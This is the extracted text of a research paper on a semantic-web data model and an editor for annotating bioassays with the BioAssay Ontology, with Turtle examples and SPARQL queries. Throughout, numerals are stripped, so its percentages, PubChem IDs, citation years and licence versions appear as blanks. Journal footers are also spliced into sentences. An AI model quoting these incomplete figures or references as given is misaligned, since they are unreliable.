a template is essentially a gateway to the overall ontology: it divides the assay annotation process into a fixed hierarchy of assignments, each of which has a prescribed list of values cherry-picked from the overall ontology. the bat vocabulary can be used to create any number of templates, which can be customized to suit the task at hand. as a starting point, we have created what we refer to as the common assay template (cat). the cat is an annotation recipe that is intended to capture the major properties that most biologists need to describe their assays, and that enables most drug discovery scientists to gain a basic understanding of an assay and its results. a condensed summary of this template is shown in fig. . unlike the class hierarchy of the bao, the tree structure of the cat is flat. while the data model allows groups and subgroups, our current template errs on the side of simplicity, and includes just a small number of different assignments, each of which is associated directly with the top-level assay, and each of which has a list of associated values (examples shown in fig. ).
figure a selection of the bao hierarchy, visualized using bioportal (http://bioportal.bioontology.org). (a) classes and (b) properties.
a template can be customized as necessary, and once it is ready, it can be used to define the way in which assays are annotated. the data model is designed to enable software to compose a user interface: presenting each of the categories, and making use of the selected values as the options that are made available to the user. it is essentially a way to restrict and simplify the large scope of the bao, reduce the degrees of freedom, and remove ambiguity. having curated the assignments and values so that the lists consist of the minimum number of relevant possibilities, each of them decorated with a meaningful label and a more detailed description, it becomes possible to design a user experience that is suitable for a scientist who is an expert in the field but does not necessarily know anything about semantic web concepts. in order to explore this approach, we have created a software package called the bioassay schema editor, which is open source and available via github.
figure an overview of the cat at the time of publication (uri: http://www.bioassayontology.org/bas#commonassaytemplate), showing each of its assignments together with a sample of the prescribed values: bioassay type, assay format, assay design method, assay cell line, organism, biological process, target, assay mode of action, result, result unit of measurement, assay screening campaign stage, assay footprint, assay kit, physical detection method, detection instrument and perturbagen type.
it is written using java and runs on the major desktop platforms (windows, mac & linux). the software implements the data model that we describe in this article. our priorities for this work are to: (1) establish a data model for bioassay templates; (2) create an intuitive software package for editing these templates and using them to annotate real data; and (3) collaboratively establish a cat for general purpose use. we have put a considerable amount of effort into the user interface for editing templates, even though we expect only a small fraction of biologists will ever be directly involved in editing them. we have also invested significant effort towards developing a one-size-fits-most template, the cat. our goal with the cat was to enable capture of ∼ % of the most commonly used terms, and to present them in a logical and concise way, so that a large proportion of users will be able to use it as-is to add a significant amount of value to their protocol data. in addition, the cat can act as a starting point for modification if scientists would like to tailor the template. scientists working in research groups that routinely make use of terms that are not included in the cat can elect to start with an existing template and add the missing assignments and values, and also delete whole groups of content that do not apply to their research. a research group may accumulate a collection of task-specific templates, allowing their scientists to pick the most appropriate one. by ensuring that the editor software is easy to use, runs on all platforms, and is open source, we hope to ensure that this option is quite practical for any research group with access to basic information technology expertise. we intend to encourage the community to make use of these resources, both as standalone tools and interoperating with the electronic lab notebook software that we are presently designing. one of the implicit advantages of using semantic web technology as the underlying data format (triples), together with a well-established set of reference terms (the bao and various linked ontologies), is that even if two scientists are annotating assays with different templates, it is highly likely that many or most of the terms will overlap, even if the templates were created from scratch. since the final deliverable for an annotated assay is the semantic web, the output can be subjected to the entire universe of software designed to work with rdf triple stores. as more assays are annotated, the scope and power of queries and informatics approaches for enhancing drug discovery projects are similarly increased. with a large corpus of annotated assays available, scientists will be able to make better use of prior work for understanding structure-activity relationships, uncovering experimental artifacts, building machine-learning models, and reducing duplicated effort.

methods
data model
the semantic description of templates and annotations uses a small number of additional uris, each of which has the root stem http://bioassayontology.org/bat, and which are denoted using the turtle-style abbreviated prefix "bat" (see the w3c resource description framework, http://www.w3.org/RDF/, and the w3c rdf turtle specification, http://www.w3.org/TR/turtle/). the hierarchical model for describing a template is shown in fig. .
parent:child relationships denoted by an arrow indicate one-to-many relationships, while the properties listed in the boxes underneath the nodes are one-to-one relationships. a template definition begins with the root, which is distinguished by being of type bat:bioassaytemplate. the root is also of type bat:group, and has some number of child nodes, which are themselves either assignments or subgroups. an assignment node has several scalar properties, including label and description, and it also refers to a property resource. these are typically mapped to uri resources found within the bao (e.g. http://www.bioassayontology.org/bao#bao_ , label: "has assay format"). each assignment has some number of values associated with it, and these make up the list of available options. each value is primarily identified by the resource that it maps to, which is typically found in the bao (e.g. http://www.bioassayontology.org/bao#bao_ , label: "cell based format"). besides the label and description, which are customizable within the template data model, the reference uri has its own implied class hierarchy (e.g. "cell based format" is a subclass of "assay format"), which is not encoded in the template data model, but is inferred once it is paired with the bao and its linked ontologies.
figure bat data model, which is used to describe a template. the template root (of type bat:bioassaytemplate and bat:group) is linked via bat:hasgroup to subgroups and via bat:hasassignment to assignments; each assignment carries rdfs:label, bat:hasdescription and bat:hasproperty, and is linked via bat:hasvalue to value nodes, each of which has rdfs:label, bat:hasdescription and bat:mapsto.
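as a concrete illustration of this hierarchy, the turtle sketch below defines a toy template with a single "assay format" assignment and two prescribed values. it is a hand-written example under stated assumptions, not an excerpt from the cat: the ex: namespace is invented for illustration, the bat term spellings follow the text of this article, and the bao local names (bao:BAO_PPPPPPP and so on) are placeholders standing in for the numeric bao identifiers that carry the quoted labels.

@prefix bat:  <http://www.bioassayontology.org/bat#> .
@prefix bao:  <http://www.bioassayontology.org/bao#> .
@prefix rdfs: <http://www.w3.org/2000/01/rdf-schema#> .
@prefix ex:   <http://example.org/templates#> .            # placeholder namespace

# the root is both a template and a group, and holds one assignment directly
ex:miniTemplate
    a bat:bioassaytemplate , bat:group ;
    rdfs:label "mini template" ;
    bat:hasdescription "toy template with a single assignment" ;
    bat:hasassignment ex:assayFormatAssignment .

# an assignment: its label, description, the bao property it refers to, and its prescribed values
ex:assayFormatAssignment
    a bat:assignment ;
    rdfs:label "assay format" ;
    bat:hasdescription "overall format of the assay" ;
    bat:hasproperty bao:BAO_PPPPPPP ;                      # placeholder: the property labelled "has assay format"
    bat:hasvalue ex:valueCellBased , ex:valueBiochemical .

# each value maps onto a bao class and carries a display label
ex:valueCellBased
    bat:mapsto bao:BAO_XXXXXXX ;                           # placeholder: the class labelled "cell based format"
    rdfs:label "cell based format" .

ex:valueBiochemical
    bat:mapsto bao:BAO_YYYYYYY ;                           # placeholder: the class labelled "biochemical format"
    rdfs:label "biochemical format" .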
the schema for annotation of assays is shown in fig. . the assay is given a distinct uri, and is associated with several properties such as label and description. the template is recorded, as is an optional reference to the origin of the assay (which may be a semantic web resource, or a doi link to a journal article). the free-text description of the assay can also be recorded using the hasparagraph predicate. the assay is associated with some number of annotations, which are primarily linked to assignments within the corresponding template. for annotations that assert a uri link, the hasvalue predicate typically corresponds to one of the available values that was prescribed for the assignment in the template definition, and generally refers to a term defined in the bao, though custom references can be used; alternatively, the annotation may be specified using the hasliteral predicate instead, which means that the user has entered data in a different form, typically text or a numeric value. the hasproperty predicate is generally copied from the corresponding assignment. when annotating an assay, each assignment may be used any number of times: zero instances means that it has been left blank, while asserting two or more triples means that all of the values apply. the relationship between assays and annotations has no nesting: the intrinsic group/sub-group structure of any particular annotation can be inferred from the template, since the usestemplate and isassignment predicates refer to the origins in the template.
figure data model for annotated assays, which is used to apply a template to a specific assay. an assay (of type bat:bioassaydescription, with rdfs:label, bat:hasdescription, bat:usestemplate, bat:hasorigin and bat:hasparagraph) is linked via bat:hasannotation to annotation nodes, each carrying isassignment, rdfs:label, bat:hasdescription, bat:hasproperty, and either bat:hasvalue (a reference) or bat:hasliteral (a literal).

software
the bioassay schema editor is available from github (https://github.com/cdd/bioassay-template) and may be used under the terms of the gnu public license . (the license allows anyone to use the source code for any purpose, on the condition that products making use of it must be made available under a license that is at least as open; copyright for the project is held by collaborative drug discovery, inc.; see http://www.gnu.org/licenses/gpl- . .en.html). the code is written using java, and the user interface is based on javafx. semantic web functionality is implemented by incorporating the apache jena library (see http://jena.apache.org). the project includes a snapshot of the bao and some of the linked ontologies (downloadable owl files for the bao are available at http://bioassayontology.org/bioassayontology), as well as the latest version of the cat schema. it should be assumed that the project will continue to evolve until well after the publication date of this article. the application operates on a datafile referred to as a schema, which is represented as a collection of triples (in turtle format, with the extension .ttl). a schema is expected to include a single template, for which the root node is of type bat:bioassaytemplate, and may optionally contain any number of assays that have been (or will be) annotated using that same template. triples are used as the serialization format so that the editable files can be used as-is by a triple store, and become a part of the semantic web with no further modification.
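to give a sense of what such a schema file can contain beyond the template itself, the following turtle sketch annotates one hypothetical assay against the toy template shown earlier. again this is an illustration under stated assumptions: the ex: namespace, the pubchem url placeholder, the second assignment (ex:assayKitAssignment) and the bao local names are invented stand-ins, and the bat term spellings follow the text of this article.

@prefix bat:  <http://www.bioassayontology.org/bat#> .
@prefix bao:  <http://www.bioassayontology.org/bao#> .
@prefix rdfs: <http://www.w3.org/2000/01/rdf-schema#> .
@prefix ex:   <http://example.org/assays#> .               # placeholder namespace

ex:exampleAssay
    a bat:bioassaydescription ;
    rdfs:label "example cytotoxicity assay" ;
    bat:usestemplate ex:miniTemplate ;                     # the toy template sketched above
    bat:hasorigin <https://pubchem.ncbi.nlm.nih.gov/bioassay/NNNNNN> ;   # placeholder source record
    bat:hasparagraph "free-text protocol description goes here" ;
    bat:hasannotation ex:annotFormat , ex:annotKit .

# a uri-valued annotation, drawn from the prescribed values of the assignment
ex:annotFormat
    bat:isassignment ex:assayFormatAssignment ;
    rdfs:label "assay format" ;
    bat:hasproperty bao:BAO_PPPPPPP ;                      # copied from the assignment
    bat:hasvalue bao:BAO_XXXXXXX .                         # "cell based format"

# a literal-valued annotation, used when no suitable uri is prescribed
ex:annotKit
    bat:isassignment ex:assayKitAssignment ;               # a second, hypothetical assignment
    rdfs:label "assay kit" ;
    bat:hasproperty bao:BAO_QQQQQQQ ;                      # placeholder property
    bat:hasliteral "vendor-specific viability kit" .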
figure shows the main window for the application, which has loaded a contemporary version of the cat, and has several accompanying assays awaiting annotation. the components that make up the template are shown as a hierarchy on the left hand side of the panel. selecting any of the groups or assignments causes the detail view on the right to be filled in with the corresponding content. adding, deleting, renaming etc. of groups, assignments and values is fairly mundane, and follows standard desktop user interface design patterns. selecting uri values for properties and values requires a more specific interface, and is composed by summarizing the bao vocabulary, which is loaded into the application at the beginning. resources can be selected using a dialog box that can present the list of options in a flat list, with an optional search box for restricting the list (fig. a), or by using the hierarchy view that shows the position in the bao ontology (fig. b).
figure a snapshot of the bioassay schema editor. on the left hand side the current template is shown at the top (with its hierarchy of groups and assignments), and any assays currently in progress are shown underneath. the panel on the right shows the details for an assignment (assay format) and the prescribed values that are associated with it.
the dialog box can also be used to add multiple values at once, which is particularly convenient when a branch of the bao encompasses multiple terms that are all valid options. when a resource is selected, its label and description are imported from the bao into the template: these values can be edited after the fact, but by default they are the same as in the underlying vocabulary.
figure a snapshot of the two main tabs used for locating a value in the bao. (a) shows the list view, which is flat, while (b) shows the values in the context of the actual hierarchy of the underlying ontology.
the primary role of the schema editor is to provide a convenient way to edit templates, but in support of this goal, it also provides an interface for using the template to annotate assays. the interface can be used for generating training data (e.g. for model generation), but it is mainly intended as a way to 'test drive' the current template. because the annotation process is directly derived from the template, having the two editing processes side by side is advantageous when the template is being designed. for example, the operator can begin annotating an assay, and if a value is missing from one of the assignments, or a new kind of assignment turns out to be necessary, this can be added to the template within the same editing session. figure a shows an example of an assay that has been annotated. the detail view has a placeholder for description text, which is particularly useful when the content has been imported from some external source, and the annotations are being made by converting the protocol text into semantic annotations. clicking on any of the annotation buttons brings up a panel of options (fig. b) that represent the prescribed values for the assignment. each of the assignments can be left blank, annotated once, or given multiple values. the ideal use case is when the value (or values) occurs within the list of prescribed values, but since the data model allows any uri, the user interface also allows the user to insert a custom uri. in cases where no uri is listed in the template (e.g. a concept that does not have an established uri), it is possible to add plain text for any of the assignment annotations. while this has no meaning from a machine-learning point of view, it can serve as a convenient placeholder for terms that will be invented in the future.

results
templates
we set out to create a cat that includes the basic details essential to defining any bioassay: assay type, format, target and biology, results and pharmacology, and other details.
the cat was developed with the opposing goals of identifying assignments that (1) would be limited in number, in order not to be overly burdensome, vs. (2) would comprehensively cover the majority of the information contained in written descriptions of bioassays. we also considered the type of information that would be utilized by an end user attempting to search, filter, and aggregate assays by their bioassay annotations. for example, details such as the assay footprint (plate type), assay kit, and detection instrument were included because they may be useful terms for identifying experimental artifacts. biological process and other target-related information were included to enable aggregating results across similar drug discovery projects for model-building and other applications. finally, we limited assignments to those where the bao offered sufficient options for possible values. since the goal of the project is to generate machine-readable assay annotations, we avoided assignments where bao terms were not available, such as those characterizing in vivo assays, and especially assignments whose values would be very specific to each assay, such as negative and positive controls. these areas will be addressed in the future once the underlying vocabulary (bao or otherwise) is sufficiently developed to expand the domain. similarly, the cat falls short of capturing detailed protocol steps. in its present incarnation, it cannot be considered a complete replacement for the text that is typically used to describe an assay, though we do intend to pursue this level of detail in future work. for the present, we are primarily concerned with utilizing the rich vocabulary within the bao to achieve maximum impact with minimum additional burden on the end-user workflow.
figure a snapshot of the annotation interface that is available within the template editor. (a) the current template can be applied to specific assays within the same overall user interface, which is a convenient way to evaluate its suitability. selecting any of the assignments brings up a dialog box presenting all of the prescribed values (b).
to develop the cat, we used the following process: first, biologists independently considered each of the terms available in the bao and prioritized assignments for the cat. each assignment was associated with a number of possible values based on the bao hierarchy. then, quantitative and qualitative approaches were used to determine whether the prioritized assignments included in the cat were sufficient to fully describe most assays. for the quantitative approach, we assessed the set of pubchem bioassays (wang et al., ) that were previously annotated by hand by bao experts (schürer et al., ). in that exercise, the bao experts aimed to fully annotate each assay, capturing all applicable information for more than a hundred different categories or terms. if there was not an applicable value, the assignment or category was left blank. we analyzed the use of the bao terms to assess the utility and comprehensiveness of the assignments included in the cat compared to the remaining terms. we found that the cat assignments were annotated in % of the pubchem assays, compared to % for the remaining terms. we also found that % of the values for cat assignments were bao terms rather than literal or non-uri based terms, compared to % in the remaining categories.
these results suggested that the cat includes assignments that are both relevant to the majority of assays as represented in pubchem and well covered by the bao. for an in-depth qualitative assessment of the cat, biologists annotated a wide variety of assays, encompassing different assay types (e.g., cell viability, enzyme activity, binding, and admet), assay formats (e.g., cell-based, biochemical, microsome, organism, tissue, etc.), and assay design methods (e.g., atp quantitation, cell number, immunoassays, gene expression, radioligand binding, etc.), as summarized in table . we found that in many cases, both for assay descriptions available from pubchem and for in-house screening assay descriptions, the cat captured much of the relevant information. for example, annotating an assay for cell viability (pubchem id ) shows that all but two of the cat assignments are readily annotated from the short descriptive information provided (fig. ). 'target' is left blank, as it is not applicable (this assay aims solely to identify cytotoxic compounds); 'detection instrument' was not noted. similarly, as shown in fig. , all applicable cat assignments ( of the ) are annotated from the description of a competitive binding assay (pubchem id ). figure also illustrates that multiple values can be annotated for a single assignment, enabling content from complex assays to be captured. together, these two examples highlight that both cell-based and biochemical assays can be extremely well suited to being annotated using the cat. however, there were some cases where the cat was less effective in capturing important information. for example, of the cat assignments could be annotated for pubchem id , some with multiple values; however, the 'big picture' view of this rather complex primary assay is not as readily apparent from its 'cat profile' as from a single sentence in the description (fig. ). in addition, this pubchem record had extensive technical details such as reagent components, liquid handling volumes and instruments, times of incubation, and plate processing steps, which could be important for identifying matching assays or interpreting the results. another example of a poor fit for the cat, as noted earlier, is in vivo assays.
figure first example of pubchem assay text ideally suited for annotation with the cat (a cell viability assay). (a) text from the description in the pubchem record: yellow = information captured in the cat, green = information not captured but possible for a future version (e.g., controls, data processing), red = information beyond the scope of the bao (technical details). (b) cat assignments in the bioassay schema editor.
table representation of the cat in the sample assay set, listing for each of the cat assignments (bioassay type, assay format, assay design method, assay cell line, organism, biological process, target, assay mode of action, result, result unit of measurement, assay screening campaign stage, assay footprint, assay kit, physical detection method, detection instrument, perturbagen type) the number of test assays with at least one value and the number of unique values annotated.
these are largely beyond the scope of this effort, which is currently constrained to terms defined by the bao: key parameters such as route of administration, dose, dose units, and type of model (e.g. xenograft, disease) are not well represented. these and other limitations will be addressed in the future by adding to or extending the underlying ontologies. finally, as noted earlier, we designed the cat to be a 'one-size-fits-most' template. a summary of assignments for the complete set of assays annotated in the course of developing the cat shows we have achieved this (table ). one consequence of this 'one-size-fits-most' strategy is that certain attributes (such as those highlighted in green or red in figs. and ) have been omitted. depending on one's perspective, these types of data (such as positive and negative controls, data processing/normalization steps, relevant disease indication, and specific protocol details such as pre-incubation of compounds with the target, or the time or temperature of an assay) could be viewed as essential. we decided to exclude this type of information from the cat because of irregularity of appearance in bioassay descriptions, the lack of coverage by the bao, or incompatibility with the current data model. expanding into this area is an opportunity for future development, and it should be noted that the cat may be used as a starting point for templates that provide a set of assignment options that are customized for subcategories of assays, or even specific projects.
figure second example of pubchem assay text ideally suited for annotation with the cat (a competitive binding assay). (a) text from the description in the pubchem record: yellow = information captured in the cat, pink = information added as 'literal' values (i.e., too specific to exist as a bao entry, but deemed valuable), green = information not captured but possible for a future version (e.g., controls, data processing), red = information beyond the scope of the bao (technical details). (b) cat assignments in the bioassay schema editor; annotations added as 'literal' values are highlighted yellow and contained in single quotes. note that multiple values can be annotated for a single cat assignment (target, biological process, assay mode of action, assay screening campaign stage, perturbagen type).
we believe the next immediate step should be to apply our cat to a large (> , ) set of assays, both to facilitate new meta-analyses and to identify potential gaps in annotation revealed by such studies. pubchem possibly the most voluminous source of openly accessible bioassay data can be found on pubchem, which hosts more than . million assay records at the time of publication, and is growing rapidly. these are individually associated with the chemical structures of the compounds for which the measurements were made. each of the assays is decorated pubchem assay (id ) origin: https://pubchem.ncbi.nlm.nih.gov/bioassay/ has bioassay bioassay type protein-rna interaction assay protein-small molecule interaction assay has assay format assay format biochemical format has assay design method assay design method binding assessment method is cell line of assay cell line (not assigned) has organism organism homo sapiens has biological process biological process g-protein coupled receptor signaling pathway has biological macromolecule target kinase "grk " has mode of action assay mode of action competitive binding has result result percent response has unit of measurement result unit of measurement percent has assay stage assay screening campaign stage primary assay has assay footprint assay footprint well plate uses assay kit assay kit (not assigned) has detection method physical detection method flow cytometry uses detection instrument detection instrument cyan flow cytometer has perturbagen perturbagen type compound library assay background and significance: a small family of g protein-coupled receptor (gpcr) kinases (grks) nega�vely regulates heterotrimeric g protein signaling by phosphoryla�ng mul�ple sites in the cytoplasmic loops and tails of ac�vated gpcrs [krupnick, et al. ]. through this process, cells adapt to persistent s�muli that act at gpcrs and protect themselves from damage incurred by sustained signaling. grks can also play maladap�ve roles in human disease. grk is overexpressed during heart failure, which not only uncouples cardiac receptors from the central nervous system, but also promotes the release of excessive amounts of catecholamines from the adrenal gland [vatner, et al ]. inhibi�on of grk by transgenic pep�des prevents cardiac failure in mouse models [rockman, et al. ], sugges�ng that grk is an excellent target for the treatment of heart disease. however, selec�ve small molecule inhibitors of grks have not been reported, perhaps due to high homology among the ac�ve sites of grks and other agc kinases. over the last six years, our lab has made significant progress in understanding the structure and func�on of grks, and we are currently inves�ga�ng the molecular basis for the selec�ve inhibi�on of grk by a high affinity rna aptamer [tse and boger, ]. preliminary crystallographic studies of this complex demonstrate that the aptamer binds primarily to the large lobe of the kinase domain, where it blocks the entrance to the nucleo�de binding site of the kinase domain. in the hts assay reported here, an rna aptamer is used in a displacement assay to iden�fy small molecules that bind to regions on grk outside of its ac�ve site that are also cri�cal for ac�vity. this is a robust flow cytometry protein interac�on assay to screen for compounds that compete with rna binding to grk . using ac�vity-based secondary screens, we will confirm which hits derived from hts campaigns exhibit direct binding to grk and inhibit kinase ac�vity. 
figure example of an assay partially suited for annotation with the cat (a flow cytometry protein interaction assay). (a) text from the description in the pubchem record: yellow = information captured in the cat, pink = information added as 'literal' values (i.e., too specific to exist as a bao entry, but deemed valuable), green = information not captured but possible for a future version (e.g., controls, labels of target and ligand, assay quality data (z′)), red = information beyond the scope of the bao (technical details). (b) cat values assigned in the bioassay schema editor capture key parameters of the assay yet do not capture the complexity of the assay articulated in the single sentence (arrow): "a flow cytometry protein interaction assay to screen for compounds that compete with rna binding to grk."
while many of the entries contain a significant amount of detail, the phrasing style and level of detail varies considerably, often erring on the side of too little or too much information about the assay protocol. nonetheless, the pubchem assay collection represents one of the best and most convenient sources of data for annotation purposes, and for this reason we have added a feature to the bateditor that explicitly searches for pubchem records, as shown in fig. . the dialog box allows the user to type in a pubchem assay id number, or to hit the button labelled random, which picks an arbitrary assay from the entire collection, and fills in the corresponding text and uri of origin. while a large proportion of assays loaded into pubchem contain only sparse tags about the data source, or the abstract of the corresponding publication, there are a significant number of records that contain lengthy descriptions of the assay. the dialog box provides an opportunity for the user to tidy up the text (e.g. removing irrelevant content) prior to importing it into the schema. the content is then added to the list of assays being annotated within the schema model, whereby the origin is recorded as a link to the assay, and the text is associated using the hasparagraph predicate. once the text is augmented with annotations using the current template, it becomes a useful entry for training data. this is one of our main strategies for generating a corpus of data for machine-learning purposes, which will ultimately find its way into a user friendly eln for bioassay annotation. analysis because the data model we describe is based on semantic web triples, and the file format that is used by the bioassay schema editor is made up of triples (in turtle format), it means that any templates and assay annotations can be loaded directly into a triple store database, and queried using sparql queries. content can be hosted on private servers for local use, or it can be exposed to the greater web of connected data. supplementary information describes a configuration script for the open source apache fuseki jena server which can be used to load the bao, its related ontologies, and some number of files saved with the bioassay schema editor, which can then be served up as read-only content. once the content is available via a sparql endpoint, there are a number of boilerplate queries that can be used to extract summary and specific information. fetching a list of all bioassay templates can be accomplished using the following query: prefix bat: <http://www.bioassayontology.org/bat#> prefix rdfs: <http://www.w .org/ / /rdf-schema#> select ?template ?label ?descr where { ?template a bat:bioassaytemplate ; rdfs:label ?label . optional {?template bat:hasdescription ?descr .} } clark et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. /supp- http://dx.doi.org/ . /peerj-cs. https://peerj.com/ the above query identifies any resource that is tagged as having the bat type. obtaining information about the assignments that are associated with a template can be done by looking for resources of type group that are associated with it. obtaining figure dialog box for random lookup of assays from pubchem. clark et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/ a summary list of assignments that are attached to the top level (i.e. 
obtaining a summary list of assignments that are attached to the top level (i.e. not within a subgroup) can be accomplished with a query similar to the following (using the same prefixes as above), which explicitly references the cat:

select ?assn ?label ?descr ?property ?numvalues
{
  <http://www.bioassayontology.org/bas#commonassaytemplate> bat:hasassignment ?assn .
  ?assn a bat:assignment ;
        rdfs:label ?label ;
        bat:hasproperty ?property .
  optional { ?assn bat:hasdescription ?descr . }
  {
    select ?assn (count(?value) as ?numvalues)
    where { ?assn bat:hasvalue ?value . }
    group by ?assn
  }
}
order by ?label

similarly, assignments with one level of nesting can be obtained with a slightly longer query, which explicitly inserts a subgroup in between the template and the assignment:

select ?group ?glabel ?assn ?label ?descr ?property ?numvalues
{
  <http://www.bioassayontology.org/bas#commonassaytemplate> bat:hasgroup ?group .
  ?group a bat:group ;
         rdfs:label ?glabel ;
         bat:hasassignment ?assn .
  ?assn a bat:assignment ;
        rdfs:label ?label ;
        bat:hasproperty ?property .
  {
    select ?assn (count(?value) as ?numvalues)
    where { ?assn bat:hasvalue ?value . }
    group by ?assn
  }
}
order by ?glabel ?label

to query for information about the prescribed values for an assignment (in this case the bioassay assignment from the cat), the following query can be used:

select ?property ?value ?label
{
  <http://www.bioassayontology.org/bas#bioassay> bat:hasproperty ?property ;
      bat:hasvalue [ bat:mapsto ?value ; rdfs:label ?label ] .
}

the query specifically pulls out the property field, which is typically a link into the bao property terms, and the value field, which is typically a link into the bao classes. pursuing either of these resources provides a wealth of implicit information, partly from the hierarchical nature of the bao terms, and partly from the unlimited opportunities for these terms to be linked to other semantic resources. to obtain a list of assays that have been annotated using one of the templates, the following query can be used:

select ?assay ?label ?descr ?template
where
{
  ?assay a bat:bioassaydescription ;
         rdfs:label ?label ;
         bat:usestemplate ?template .
  optional { ?assay bat:hasdescription ?descr . }
}

obtaining all of the annotations for such an assay can be done with:

select ?assn ?label ?property ?value ?literal ?group
where
{
  <http://www.bioassayontology.org/bas#exampleassay> bat:hasannotation ?annot .
  ?annot bat:isassignment ?assn ;
         rdfs:label ?label ;
         bat:hasproperty ?property .
  optional { ?annot bat:hasvalue ?value }
  optional { ?annot bat:hasliteral ?literal }
  ?group a bat:group ;
         bat:hasassignment ?assn .
}
we have provided a proof of concept tool that creates a user interface based on the template data model, and made this available to the community as open source. the data model that we have created follows a simplistic pattern, where elementary facts can be asserted. by leveraging the implied value of the underlying ontology, a small collection of a dozen or so such annotations provides a significant amount of machine-readable context about the assay. while insufficient to completely define an assay protocol experiment, this stands in contrast to the standard practice of providing essentially zero machine-readable information (i.e. plain english text with quasi-standardized jargon). we have made available the cat which was designed by biologists with the objective of leveraging the bao to provide the largest amount of useful, relevant, machine-readable information with the fewest number of additional data points needing to be captured by the originating scientist. the cat is expected to be useful for a wide variety of sorting, filtering, and data aggregating tasks that drug discovery scientists need to be able to carry out on a large scale, but currently cannot due to the absence of machine- readable annotations. the cat prioritizes assignments that biologists consider most central to describing their assays and reporting assay results. annotations for these assignments will enable biologists to ask complex queries. for example, one could ask if there are systematic differences in cell-based versus biochemical-based assays for a certain target class, such as kinases. one could determine if a certain assay set-up, such as -well plates using a spectrophotometer were likely to have a higher hit rate. similarly, one could identify if a certain compound or class of compounds is active in multiple assays, and if those assays assess similar biological processes or if the activity is likely to be an artifact. by focusing on assignments out of more than a hundred options available in the bao, the cat is meant to impose a minimal burden for annotating scientists. our goal is to make annotating assays simple and easy so that the practice may be generally adopted. templates are malleable and scientists can easily include other assignments. one critical type of information that is not included in the current framework is protocol steps, which would be essential for directly comparing two assays. in the future, it would be useful if this information were machine-readable. however, semantic technology using a simplistic data model like the bat cannot capture sequences of information. capturing procedural or protocol steps would require the development of a clark et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com/ http://dx.doi.org/ . /peerj-cs. more complex data model. under the current system, we imagine that queries using annotations from the cat will allow scientists to hone in on similar assays, but for the moment, experts will still need to read the full assay descriptions to make decisions about combining different assays’ data sets. we have carried out this work in the context of a much larger scope, which is to provide scientists with tools to easily annotate bioassays and other related experiments in a way that is complete and machine-readable. 
given that the standard industry practice does not involve adding any machine readable data to assay protocols, and that there are currently no widely available tools to do so with a user experience that is sufficiently painless for mass adoption, we have taken an incremental approach. this additional work has been done in order that we can continue with our previous work that was focused on using machine learning techniques to accelerate manual assignment of assays (williams et al., ). our immediate follow-up goals are to make use of the cat to gather a large corpus of training data, both from active users of cdd vault, and from existing repositories such as pubchem. this training data will be used to ensure that our enterprise eln tools will be supported by machine learning technology as soon as they are unveiled. we are also pursuing options for extending the bat data model so that it is capable of capturing more sophisticated information about assays, e.g. linking to other ontologies to cover more types of assays; adding terminology for capturing quantities; addition of indefinite numbers of preparation steps; dependent assignment types, etc. one critical step when we enable connecting with other ontologies will be the ability to link the ‘target’ to a unique identifier such as geneid or uniprotid. each unique target identifier can be associated with a rich array of corresponding go terms, of which a subset are mapped into the default selection of bao classes. this will enable comparison of assays based on specific targets and related biological processes or molecular functions. while our first objective is horizontal scaling, i.e. ensuring that all assay protocols have semantic annotations that make a large portion of the content machine-readable, pursuing vertical scaling is also of great interest, i.e. making it possible for the semantic annotations to replace the need for use of english text (soldatova et al., ). this brings about some exciting possibilities beyond just improvement of searching and matching, such as uploading protocols to robotic assay machinery, or making the publication process multi-lingual, thus alleviating a considerable burden to non-native english speakers. pursuing this goal will require significant additions to the bao itself, as well as making increased use of borrowed terms from other ontologies. the technology that we have described in this article has been created for the purpose of improving the electronic lab notebook (eln) technology that is offered by collaborative drug discovery, inc. (cdd), and we have begun work on a web- based interface for using templates such as the cat for annotating assay protocols. we have disclosed all of the underlying methods, data and open source code because we welcome participation by anyone and everyone. while cdd is a privately held for-profit company, it is our firm belief that improvement to this particular aspect of scientific research is a positive sum game, and we have more to gain by sharing than by keeping our technology entirely proprietary. clark et al. ( ), peerj comput. sci., doi . /peerj-cs. / a preliminary version of the web inter- face can be found at http:// bioassayexpress.com. at the time of writing this service is in an early pre- alpha phase, but will be updated as the project progresses. clark et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. http://bioassayexpress.com http://bioassayexpress.com https://peerj.com/ http://dx.doi.org/ . /peerj-cs. 
supporting materials the bioassay schema editor is publicly available from github (https://github.com/cdd/ bioassay-template). the source code for the application is available under the terms of the gnu public license (gpl) v , which requires that derived works must also be similarly open. the underlying semantic data model for the template and assay annotation, as well as the cat, are public domain: they are not copyrighted, and no restrictions are placed on their use. the bao is available from the corresponding site (http://bioassayontology.org/bioassayontology) under the creative commons attribution license v . additional information and declarations funding this work was funded in part from the nih ncats phase sbir grant # r tr - “simplifying encoding of bioassays to accelerate drug discovery” as described on https://projectreporter.nih.gov/reporter.cfm. the funders had no role in study design, data collection and analysis, decision to publish, or preparation of the manuscript. grant disclosures the following grant information was disclosed by the authors: nih ncats phase sbir: r tr - . competing interests all authors are employees of collaborative drug discovery, inc. author contributions � alex m. clark conceived and designed the experiments, performed the experiments, contributed reagents/materials/analysis tools, wrote the paper, prepared figures and/or tables, performed the computation work, reviewed drafts of the paper. � nadia k. litterman conceived and designed the experiments, analyzed the data, contributed reagents/materials/analysis tools, wrote the paper, prepared figures and/or tables, reviewed drafts of the paper. � janice e. kranz conceived and designed the experiments, analyzed the data, contributed reagents/materials/analysis tools, wrote the paper, prepared figures and/or tables, reviewed drafts of the paper. � peter gund analyzed the data, contributed reagents/materials/analysis tools, wrote the paper, reviewed drafts of the paper. � kellan gregory contributed reagents/materials/analysis tools, wrote the paper, reviewed drafts of the paper. � barry a. bunin contributed reagents/materials/analysis tools, wrote the paper, reviewed drafts of the paper. clark et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://github.com/cdd/bioassay-template https://github.com/cdd/bioassay-template http://bioassayontology.org/bioassayontology https://peerj.com/ http://dx.doi.org/ . /peerj-cs. data deposition the following information was supplied regarding data availability: github: https://github.com/cdd/bioassay-template. supplemental information supplemental information for this article can be found online at http://dx.doi.org/ . /peerj-cs. #supplemental-information. references abeyruwan s, vempati ud, küçük h, visser u, koleti a, mir a, sakurai k, chung c, bittker j, clemons p, brudz s, siripala a, morales a, romacker m, twomey d, bureeva s, lemmon v, schürer sc. . evolving bioassay ontology (bao): 